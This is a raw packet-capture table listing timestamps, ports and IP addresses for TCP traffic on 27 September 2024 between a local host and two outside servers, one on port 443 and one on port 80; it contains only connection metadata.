Sep 27, 2024 00:15:01.769668102 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.004293919 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.004374027 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.004455090 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.004517078 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.068042994 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.068080902 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.130908966 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.130944967 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.131094933 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.131347895 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.131361961 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.802233934 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.802303076 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.806386948 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.806399107 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:03.809221029 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:03.809237003 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:05.607445002 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:05.607495070 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:05.607511044 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:05.607528925 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:05.607558966 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:05.607580900 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:05.607882977 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:05.607894897 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:05.613260031 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:05.621233940 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:05.621368885 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:05.621565104 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:05.626463890 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278753996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278795958 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278829098 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278834105 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278861046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278868914 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278881073 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278894901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278908014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278928041 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278942108 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278961897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.278976917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.278994083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.279007912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.279027939 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.279036045 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.279057980 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.279083014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.279103041 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.286652088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.286746025 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.286830902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.286885977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.289026022 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.289083958 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.289596081 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.289659977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375427008 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375457048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375488043 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375519991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375550985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375551939 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375583887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375617981 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375650883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375682116 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375713110 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375720978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375720978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375720978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375720978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375720978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375741959 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375746965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375761986 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375785112 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375802040 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375817060 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375834942 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375868082 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.375937939 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375984907 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.375997066 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376019001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376044035 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376050949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376069069 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376084089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376106977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376133919 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376672029 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376703024 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376724958 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376739979 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.376759052 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376791954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.376988888 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.377043009 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.475620985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475642920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475657940 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475670099 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475683928 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475698948 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475712061 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475727081 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.475831985 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.475884914 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.476212025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.476227045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.476241112 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.476267099 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.476300955 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.476658106 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.476674080 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.476713896 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.476742029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.476999998 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477056026 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.477138042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477190971 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.477490902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477504969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477518082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477545023 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.477574110 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.477891922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477905989 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477920055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477932930 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477943897 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.477948904 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.477979898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.478013039 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.478790045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.478812933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.478827000 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.478833914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.478842020 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.478848934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.478867054 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.478904963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.479497910 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.479512930 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.479526997 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.479559898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.479584932 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.479631901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.479646921 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.479686975 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.480551004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.480566025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.480580091 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.480628014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.480653048 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.481164932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.481177092 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.481226921 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.504067898 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.504249096 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.505002975 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.505074978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567066908 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567082882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567097902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567152977 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567171097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567178011 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567189932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567205906 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567229986 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567250967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567261934 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567266941 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567292929 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567332029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567858934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567873001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567888021 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567903996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567914963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567919016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567945004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567950010 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.567960024 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.567981958 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.568006992 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.568763018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568778992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568793058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568821907 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.568854094 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.568871975 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568886042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568900108 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568913937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.568943977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.568978071 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.569737911 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569753885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569767952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569797039 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.569818974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.569833994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569848061 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569861889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569875956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.569885015 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.569905043 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.569936037 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.570672035 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570688963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570703030 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570741892 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.570750952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570765972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570770979 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.570781946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570797920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.570802927 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.570846081 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.571613073 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571628094 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571641922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571707010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571721077 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571733952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571748018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.571765900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.571765900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.571765900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.571784019 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.571803093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.572526932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572544098 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572559118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572592974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.572624922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572632074 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.572640896 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572654963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572669029 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.572671890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.572696924 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.572729111 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.573390961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573452950 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573452950 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.573467970 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573532104 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573533058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.573546886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573560953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573575020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.573585987 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.573626995 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.575171947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.575186968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.575201988 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.575232983 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.575258970 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.592993021 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.593079090 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656331062 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656347990 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656362057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656403065 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656424046 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656430960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656445026 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656460047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656474113 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656476021 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656490088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656510115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656538963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656591892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656606913 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656621933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656634092 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656636000 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656651974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656666994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656685114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656723022 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656857014 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656902075 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.656924963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656939983 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.656976938 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657006979 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657006025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657032013 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657063961 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657092094 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657181025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657196999 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657212019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657232046 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657258034 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657465935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657480001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657494068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657507896 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657516956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657524109 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657558918 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657588959 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657618046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657634020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657648087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657661915 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657665968 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657676935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657691002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657691956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657706022 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657720089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657727003 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657735109 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657752037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.657752037 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657773972 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.657795906 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658073902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658098936 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658119917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658123016 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658149004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658170938 CEST	49764	80	192.168.2.4	147.45.44.104
